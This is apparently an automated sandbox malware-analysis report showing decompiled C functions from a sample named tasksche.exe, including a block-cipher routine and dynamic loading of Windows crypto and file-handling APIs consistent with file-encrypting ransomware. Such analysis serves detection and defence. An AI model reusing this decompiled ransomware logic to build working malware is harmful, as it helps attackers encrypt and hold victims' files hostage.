                    0x0040358c
                    0x0040358f
                    0x00403592
                    0x00403598
                    0x0040359d
                    0x004035a0
                    0x004035a3
                    0x004035a6
                    0x004035ac
                    0x004035ad
                    0x004035b5
                    0x004035be
                    0x004035bf
                    0x004035c4
                    0x004035c9
                    0x004035cd
                    0x004035d0
                    0x004035d3
                    0x004035d5
                    0x004035d5
                    0x004035d5
                    0x004035a6
                    0x004035dc
                    0x004035e3
                    0x004035e6
                    0x004035ef
                    0x004035f2
                    0x004035f4
                    0x004035fd
                    0x004035fd
                    0x00403600
                    0x00403608
                    0x0040360b
                    0x00403613
                    0x00403619
                    0x0040361c
                    0x0040361f
                    0x00403627
                    0x0040363a
                    0x0040363d
                    0x00403660
                    0x00403682
                    0x00403688
                    0x0040368a
                    0x0040368d
                    0x00403690
                    0x00403690
                    0x00403690
                    0x0040361f
                    0x004036a9
                    0x004036ae
                    0x004036b2
                    0x004036b5
                    0x004036b8
                    0x004036bb
                    0x004035f2
                    0x004036c7
                    0x004036cd
                    0x004036d3
                    0x004036d6
                    0x004036df
                    0x004036e2
                    0x004036e7
                    0x004036ef
                    0x004036f2
                    0x00403701
                    0x00403709
                    0x0040371f
                    0x00403726
                    0x00403727
                    0x00403741
                    0x00403745
                    0x0040374a
                    0x00403760
                    0x00403767
                    0x00403768
                    0x0040377d
                    0x00403780
                    0x00403782
                    0x00403783
                    0x00403786
                    0x00403787
                    0x004036f2
                    0x00403794

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrowmemcpy
                    • String ID: $Q;@
                    • API String ID: 2382887404-262343263
                    • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                    • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                    • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                    • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 54%
                    			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E004031BC(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 0x1e8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x208;
					do {
						if(_t274 > 0) {
							_t260 = _v28;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_v44 = _v28 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                    0x0040379f
                    0x004037a6
                    0x004037b0
                    0x004037b9
                    0x004037be
                    0x004037bf
                    0x004037bf
                    0x004037c4
                    0x004037cd
                    0x00000000
                    0x004037d7
                    0x004037e3
                    0x004037e4
                    0x004037e5
                    0x004037e7
                    0x004037f6
                    0x004037fa
                    0x00403805
                    0x00403814
                    0x00403817
                    0x0040381a
                    0x00403820
                    0x00403828
                    0x0040382b
                    0x0040382e
                    0x00403831
                    0x00403837
                    0x00403838
                    0x00403840
                    0x00403849
                    0x0040384a
                    0x0040384f
                    0x00403854
                    0x00403858
                    0x0040385b
                    0x0040385e
                    0x00403860
                    0x00403860
                    0x00403860
                    0x00403831
                    0x00403867
                    0x0040386e
                    0x00403871
                    0x0040387d
                    0x00403880
                    0x00403882
                    0x0040388b
                    0x0040388e
                    0x00403896
                    0x00403899
                    0x004038a1
                    0x004038a7
                    0x004038aa
                    0x004038ad
                    0x004038b5
                    0x004038c8
                    0x004038cb
                    0x004038ee
                    0x00403910
                    0x00403916
                    0x00403918
                    0x0040391b
                    0x0040391e
                    0x0040391e
                    0x0040391e
                    0x004038ad
                    0x00403937
                    0x0040393c
                    0x00403940
                    0x00403943
                    0x00403946
                    0x00403949
                    0x00403880
                    0x00403955
                    0x0040395b
                    0x00403961
                    0x00403964
                    0x0040396d
                    0x00403975
                    0x0040397d
                    0x00403980
                    0x0040398f
                    0x0040399a
                    0x004039b0
                    0x004039b7
                    0x004039b8
                    0x004039d2
                    0x004039d6
                    0x004039db
                    0x004039f1
                    0x004039f8
                    0x004039f9
                    0x00403a0e
                    0x00403a11
                    0x00403a13
                    0x00403a14
                    0x00403a17
                    0x00403a18
                    0x00403980
                    0x00403a25

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrowmemcpy
                    • String ID:
                    • API String ID: 2382887404-3916222277
                    • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                    • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
                    • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
                    • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004029CC(void* _a4) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t25;
				signed int _t35;
				void* _t37;

				_t37 = _a4;
				if(_t37 != 0) {
					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
						_t25 =  *((intOrPtr*)(_t37 + 4));
						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
					}
					if( *(_t37 + 8) == 0) {
						L9:
						_t18 =  *((intOrPtr*)(_t37 + 4));
						if(_t18 != 0) {
							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
						}
						return HeapFree(GetProcessHeap(), 0, _t37);
					} else {
						_t35 = 0;
						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
							L8:
							free( *(_t37 + 8));
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
							if(_t23 != 0) {
								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
							}
							_t35 = _t35 + 1;
						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
						goto L8;
					}
				}
				return _t17;
			}









                    0x004029ce
                    0x004029d6
                    0x004029db
                    0x004029df
                    0x004029ea
                    0x004029ea
                    0x004029ef
                    0x00402a1d
                    0x00402a1d
                    0x00402a22
                    0x00402a2e
                    0x00402a31
                    0x00000000
                    0x004029f1
                    0x004029f2
                    0x004029f7
                    0x00402a12
                    0x00402a15
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004029f9
                    0x004029f9
                    0x004029fc
                    0x00402a01
                    0x00402a07
                    0x00402a0b
                    0x00402a0c
                    0x00402a0d
                    0x00000000
                    0x004029f9
                    0x004029ef
                    0x00402a45

                    APIs
                    • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$FreeProcessfree
                    • String ID:
                    • API String ID: 3428986607-0
                    • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                    • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
                    • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
                    • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25encryptionCOMMON
                    Download Yara Rule
                    C-Code - Quality: 16%
                    			E004018B9(void* __ecx) {
				signed int _t10;
				signed int _t11;
				long* _t12;
				void* _t13;
				void* _t18;

				_t18 = __ecx;
				_t10 =  *(__ecx + 8);
				if(_t10 != 0) {
					 *0x40f89c(_t10);
					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				}
				_t11 =  *(_t18 + 0xc);
				if(_t11 != 0) {
					 *0x40f89c(_t11);
					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
				}
				_t12 =  *(_t18 + 4);
				if(_t12 != 0) {
					CryptReleaseContext(_t12, 0);
					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
				}
				_t13 = 1;
				return _t13;
			}








                    0x004018ba
                    0x004018bc
                    0x004018c1
                    0x004018c4
                    0x004018ca
                    0x004018ca
                    0x004018ce
                    0x004018d3
                    0x004018d6
                    0x004018dc
                    0x004018dc
                    0x004018e0
                    0x004018e5
                    0x004018ea
                    0x004018f0
                    0x004018f0
                    0x004018f6
                    0x004018f8

                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                    • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                    • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                    • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040170A() {
				void* _t3;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t13;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				if(E00401A45() == 0) {
					L11:
					return 0;
				}
				_t18 =  *0x40f878; // 0x0
				if(_t18 != 0) {
					L10:
					_t3 = 1;
					return _t3;
				}
				_t13 = LoadLibraryA("kernel32.dll");
				if(_t13 == 0) {
					goto L11;
				}
				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
				_t11 = GetProcAddress(_t13, "CloseHandle");
				_t20 =  *0x40f878; // 0x0
				 *0x40f890 = _t11;
				if(_t20 == 0) {
					goto L11;
				}
				_t21 =  *0x40f87c; // 0x0
				if(_t21 == 0) {
					goto L11;
				}
				_t22 =  *0x40f880; // 0x0
				if(_t22 == 0) {
					goto L11;
				}
				_t23 =  *0x40f884; // 0x0
				if(_t23 == 0) {
					goto L11;
				}
				_t24 =  *0x40f888; // 0x0
				if(_t24 == 0) {
					goto L11;
				}
				_t25 =  *0x40f88c; // 0x0
				if(_t25 == 0 || _t11 == 0) {
					goto L11;
				} else {
					goto L10;
				}
			}













                    0x00401713
                    0x004017d8
                    0x00000000
                    0x004017d8
                    0x0040171b
                    0x00401721
                    0x004017d3
                    0x004017d5
                    0x00000000
                    0x004017d5
                    0x00401732
                    0x00401736
                    0x00000000
                    0x00000000
                    0x00401751
                    0x0040175e
                    0x0040176b
                    0x00401778
                    0x00401785
                    0x00401792
                    0x00401797
                    0x00401799
                    0x0040179f
                    0x004017a5
                    0x00000000
                    0x00000000
                    0x004017a7
                    0x004017ad
                    0x00000000
                    0x00000000
                    0x004017af
                    0x004017b5
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017bd
                    0x00000000
                    0x00000000
                    0x004017bf
                    0x004017c5
                    0x00000000
                    0x00000000
                    0x004017c7
                    0x004017cd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                      • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                      • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                    • API String ID: 2238633743-1294736154
                    • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                    • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                    • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                    • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401A45() {
				void* _t1;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t11;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;

				_t15 =  *0x40f894; // 0x0
				if(_t15 != 0) {
					L8:
					_t1 = 1;
					return _t1;
				}
				_t11 = LoadLibraryA("advapi32.dll");
				if(_t11 == 0) {
					L9:
					return 0;
				}
				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
				_t9 = GetProcAddress(_t11, "CryptGenKey");
				_t17 =  *0x40f894; // 0x0
				 *0x40f8a8 = _t9;
				if(_t17 == 0) {
					goto L9;
				}
				_t18 =  *0x40f898; // 0x0
				if(_t18 == 0) {
					goto L9;
				}
				_t19 =  *0x40f89c; // 0x0
				if(_t19 == 0) {
					goto L9;
				}
				_t20 =  *0x40f8a0; // 0x0
				if(_t20 == 0) {
					goto L9;
				}
				_t21 =  *0x40f8a4; // 0x0
				if(_t21 == 0 || _t9 == 0) {
					goto L9;
				} else {
					goto L8;
				}
			}












                    0x00401a48
                    0x00401a4f
                    0x00401aec
                    0x00401aee
                    0x00000000
                    0x00401aee
                    0x00401a60
                    0x00401a64
                    0x00401af1
                    0x00000000
                    0x00401af1
                    0x00401a7f
                    0x00401a8c
                    0x00401a99
                    0x00401aa6
                    0x00401ab3
                    0x00401ab8
                    0x00401aba
                    0x00401ac0
                    0x00401ac6
                    0x00000000
                    0x00000000
                    0x00401ac8
                    0x00401ace
                    0x00000000
                    0x00000000
                    0x00401ad0
                    0x00401ad6
                    0x00000000
                    0x00000000
                    0x00401ad8
                    0x00401ade
                    0x00000000
                    0x00000000
                    0x00401ae0
                    0x00401ae6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                    • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                    • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                    • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                    • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                    • API String ID: 2238633743-2459060434
                    • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                    • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                    • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                    • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272COMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				char _t100;
				void* _t112;
				void* _t113;
				int _t124;
				long _t131;
				intOrPtr _t136;
				char* _t137;
				char* _t144;
				void* _t148;
				char* _t150;
				void* _t154;
				signed int _t155;
				long _t156;
				void* _t157;
				char* _t158;
				long _t159;
				intOrPtr* _t161;
				long _t162;
				void* _t163;
				void* _t164;

				_t154 = __edx;
				_t139 = __ecx;
				_t136 = _a16;
				_t161 = __ecx;
				if(_t136 == 3) {
					_t78 =  *((intOrPtr*)(__ecx + 4));
					_t155 = _a4;
					__eflags = _t155 - _t78;
					if(_t155 == _t78) {
						L14:
						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
						__eflags = _t156;
						if(_t156 <= 0) {
							E00406A97( *_t161);
							_t14 = _t161 + 4;
							 *_t14 =  *(_t161 + 4) | 0xffffffff;
							__eflags =  *_t14;
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = _t156;
							if(_t156 <= 0) {
								__eflags = _t156 - 0xffffff96;
								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							}
							return 0x600;
						} else {
							L17:
							return 0;
						}
					}
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						E00406A97( *__ecx);
						_pop(_t139);
					}
					_t89 =  *_t161;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
						L3:
						return 0x10000;
					} else {
						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
							L11:
							_t91 =  *_t161;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
								 *(_t161 + 4) = _t155;
								_pop(_t139);
								goto L14;
							}
							E00406520(_t91);
							L10:
							goto L11;
						}
						E004064E2(_t139, _t89);
						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E00406A97( *_t161);
